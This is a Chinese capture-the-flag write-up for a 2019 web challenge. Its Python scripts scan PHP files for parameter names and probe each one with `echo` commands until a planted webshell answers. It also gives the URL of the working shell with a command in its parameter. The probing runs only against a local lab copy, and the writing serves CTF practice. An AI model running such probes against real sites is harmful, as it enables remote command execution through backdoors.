
高明的黑客

D盾扫出一堆混淆代码和 shell，不过没有几个是能用的，需要跑个脚本测试一下哪个是能用的，考察的是脚本编写能力。
上py
import os
import requests
# Directory holding the unpacked PHP sources to scan (trailing separator kept
# so that `path + filename` builds a full path).
path = "D://SOURCE//BUUOJ//[强网杯 2019]高明的黑客//www.tar//www//src//"
# Every entry of that directory; each one is treated as a candidate file.
files = os.listdir(path)
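# Names read through $_GET in one PHP file.
def GET(filename, base=None):
    """Return the parameter names used as ``$_GET['...']`` keys in *filename*.

    Args:
        filename: file name relative to the scan directory.
        base: directory to read from; defaults to the module-level ``path``.

    Returns:
        list[str]: every name found, in file order. A line may contribute
        several names; a ``$_GET['`` without a closing quote contributes none.

    Raises:
        OSError: if the file cannot be opened.
    """
    directory = path if base is None else base
    marker = "$_GET['"
    names = []
    # The marker and the names it wraps are ASCII, so they survive any
    # decoding; errors="replace" keeps a stray non-UTF-8 byte in an obfuscated
    # file from aborting the whole scan. The context manager closes the file,
    # which the original never did.
    with open(os.path.join(directory, filename), "r",
              encoding="utf-8", errors="replace") as fh:
        for line in fh:
            start = line.find(marker)
            # "!= -1" rather than "> 0": a marker at column 0 is a valid hit.
            while start != -1:
                name_start = start + len(marker)
                name_end = line.find("'", name_start)
                if name_end == -1:
                    break  # unterminated quote: nothing usable on this line
                names.append(line[name_start:name_end])
                start = line.find(marker, name_end)
    return names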
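# Names read through $_POST in one PHP file.
def POST(filename, base=None):
    """Return the parameter names used as ``$_POST['...']`` keys in *filename*.

    Args:
        filename: file name relative to the scan directory.
        base: directory to read from; defaults to the module-level ``path``.

    Returns:
        list[str]: every name found, in file order. A line may contribute
        several names; a ``$_POST['`` without a closing quote contributes none.

    Raises:
        OSError: if the file cannot be opened.
    """
    directory = path if base is None else base
    marker = "$_POST['"
    names = []
    # ASCII marker and names survive any decoding; errors="replace" keeps a
    # stray byte in an obfuscated file from aborting the scan, and the context
    # manager closes the handle the original left open.
    with open(os.path.join(directory, filename), "r",
              encoding="utf-8", errors="replace") as fh:
        for line in fh:
            start = line.find(marker)
            # "!= -1" rather than "> 0": a marker at column 0 is a valid hit.
            while start != -1:
                name_start = start + len(marker)
                name_end = line.find("'", name_start)
                if name_end == -1:
                    break  # unterminated quote: nothing usable on this line
                names.append(line[name_start:name_end])
                start = line.find(marker, name_end)
    return names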
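if __name__ == "__main__":
    # Walk every candidate file once, trying each parameter name GET()/POST()
    # extracted with an echo marker; stop at the first response that echoes
    # the marker back.
    for file in files:
        if file == ".idea":
            continue  # IDE metadata directory, not a PHP source
        print("OPEN FILE:" + file)
        for i in GET(file):
            # str.format substitutes {} placeholders; the original
            # "...%s?$s=%s".format(...) left the template untouched, so every
            # request went to a literal "/%s?$s=%s" path.
            url = "http://127.0.0.1/{}?{}={}".format(file, i, 'echo "GET SUCCESS"')
            # The context manager releases the connection for every response;
            # `in` also accepts a marker at offset 0, which find(...) > 0 missed.
            with requests.get(url=url) as response:
                if "GET SUCCESS" in response.text:
                    print("SUCCESS GET! YOU FIND THE SHELL {} BY {}".format(file, i))
                    exit(0)
        for i in POST(file):
            url = "http://127.0.0.1/{}".format(file)
            data = {i: 'echo "POST SUCCESS"'}
            with requests.get(url=url, data=data) as response:
                if "POST SUCCESS" in response.text:
                    print("SUCCESS POST! YOU FIND THE SHELL {} BY {}".format(file, i))
                    exit(0)
        print("CLOSE FILE")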
贼捞，大概一分钟只能跑七到八个文件，算了算根本跑不完。
还是要上多线程，最后是参考大佬的脚本改出来的。
/xk0SzyKwfzw.php?Efa5BVG=echo%20%27success%27
import os
import requests
import threading
import time
import sys
# Directory holding the unpacked PHP sources to scan (trailing separator kept
# so that `path + filename` builds a full path).
path = "D://SOURCE//BUUOJ//[强网杯 2019]高明的黑客//www.tar//www//src//"
# Every entry of that directory; each one is treated as a candidate file.
files = os.listdir(path)
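# Names read through $_GET in one PHP file.
def GET(filename, base=None):
    """Return the parameter names used as ``$_GET['...']`` keys in *filename*.

    Args:
        filename: file name relative to the scan directory.
        base: directory to read from; defaults to the module-level ``path``.

    Returns:
        list[str]: every name found, in file order. A line may contribute
        several names; a ``$_GET['`` without a closing quote contributes none.

    Raises:
        OSError: if the file cannot be opened.
    """
    directory = path if base is None else base
    marker = "$_GET['"
    names = []
    # The marker and the names it wraps are ASCII, so they survive any
    # decoding; errors="replace" keeps a stray non-UTF-8 byte in an obfuscated
    # file from aborting the whole scan. The context manager closes the file,
    # which the original never did.
    with open(os.path.join(directory, filename), "r",
              encoding="utf-8", errors="replace") as fh:
        for line in fh:
            start = line.find(marker)
            # "!= -1" rather than "> 0": a marker at column 0 is a valid hit.
            while start != -1:
                name_start = start + len(marker)
                name_end = line.find("'", name_start)
                if name_end == -1:
                    break  # unterminated quote: nothing usable on this line
                names.append(line[name_start:name_end])
                start = line.find(marker, name_end)
    return names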
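# Names read through $_POST in one PHP file.
def POST(filename, base=None):
    """Return the parameter names used as ``$_POST['...']`` keys in *filename*.

    Args:
        filename: file name relative to the scan directory.
        base: directory to read from; defaults to the module-level ``path``.

    Returns:
        list[str]: every name found, in file order. A line may contribute
        several names; a ``$_POST['`` without a closing quote contributes none.

    Raises:
        OSError: if the file cannot be opened.
    """
    directory = path if base is None else base
    marker = "$_POST['"
    names = []
    # ASCII marker and names survive any decoding; errors="replace" keeps a
    # stray byte in an obfuscated file from aborting the scan, and the context
    # manager closes the handle the original left open.
    with open(os.path.join(directory, filename), "r",
              encoding="utf-8", errors="replace") as fh:
        for line in fh:
            start = line.find(marker)
            # "!= -1" rather than "> 0": a marker at column 0 is a valid hit.
            while start != -1:
                name_start = start + len(marker)
                name_end = line.find("'", name_start)
                if name_end == -1:
                    break  # unterminated quote: nothing usable on this line
                names.append(line[name_start:name_end])
                start = line.find(marker, name_end)
    return names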
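def get_content(file):
    """Probe one file of the local challenge copy for a responding shell.

    Each name returned by GET(file) is sent as a query parameter and each name
    returned by POST(file) as a body field, both carrying an ``echo`` marker.
    The first response that echoes its marker back is written to
    ``shell.txt`` and the process is asked to exit.

    Args:
        file: file name relative to the scan directory (see GET/POST).

    Side effects:
        HTTP requests to 127.0.0.1, a ``shell.txt`` write on a hit, and
        ``sys.exit(0)`` on a hit. sys.exit raises SystemExit in the calling
        thread only, so when this runs in a worker thread the rest of the
        program keeps going unless the caller handles it.
    """
    print("OPEN FILE:" + file)
    for i in GET(file):
        url = "http://127.0.0.1/src/{}?{}={}".format(file, i, 'echo "GET SUCCESS"')
        # The context manager releases every response's connection (the
        # original closed only the last one, and raised UnboundLocalError on a
        # file with no parameters at all); `in` also accepts a marker at
        # offset 0, which find(...) > 0 missed.
        with requests.get(url=url) as response:
            if "GET SUCCESS" in response.text:
                print("SUCCESS GET! YOU FIND THE SHELL {} BY {}".format(file, i))
                with open("shell.txt", "w") as fh:
                    fh.write(response.text)
                sys.exit(0)
    for i in POST(file):
        url = "http://127.0.0.1/src/{}".format(file)
        data = {i: 'echo "POST SUCCESS"'}
        with requests.get(url=url, data=data) as response:
            if "POST SUCCESS" in response.text:
                print("SUCCESS POST! YOU FIND THE SHELL {} BY {}".format(file, i))
                with open("shell.txt", "w") as fh:
                    fh.write(response.text)
                sys.exit(0)
    print("CLOSE FILE")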
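if __name__ == "__main__":
    # s1 was created in the original but never acquired; holding it in the
    # worker caps the number of files probed concurrently at 100.
    s1 = threading.Semaphore(100)
    requests.adapters.DEFAULT_RETRIES = 5
    found = threading.Event()

    def _bounded(file):
        """Probe one file under the semaphore; record a hit instead of exiting."""
        with s1:
            try:
                get_content(file)
            except SystemExit:
                # get_content calls sys.exit(0) on a hit; inside a worker
                # thread that would only end this thread, so flag it for the
                # main thread instead.
                found.set()

    workers = []
    for file in files:
        if found.is_set():
            break
        # Only the thread probes the file; the original also called
        # get_content(file) synchronously first, scanning every file twice
        # and serialising the run it meant to parallelise.
        t = threading.Thread(target=_bounded, args=(file,))
        t.start()
        workers.append(t)
    for t in workers:
        t.join()
    if found.is_set():
        sys.exit(0)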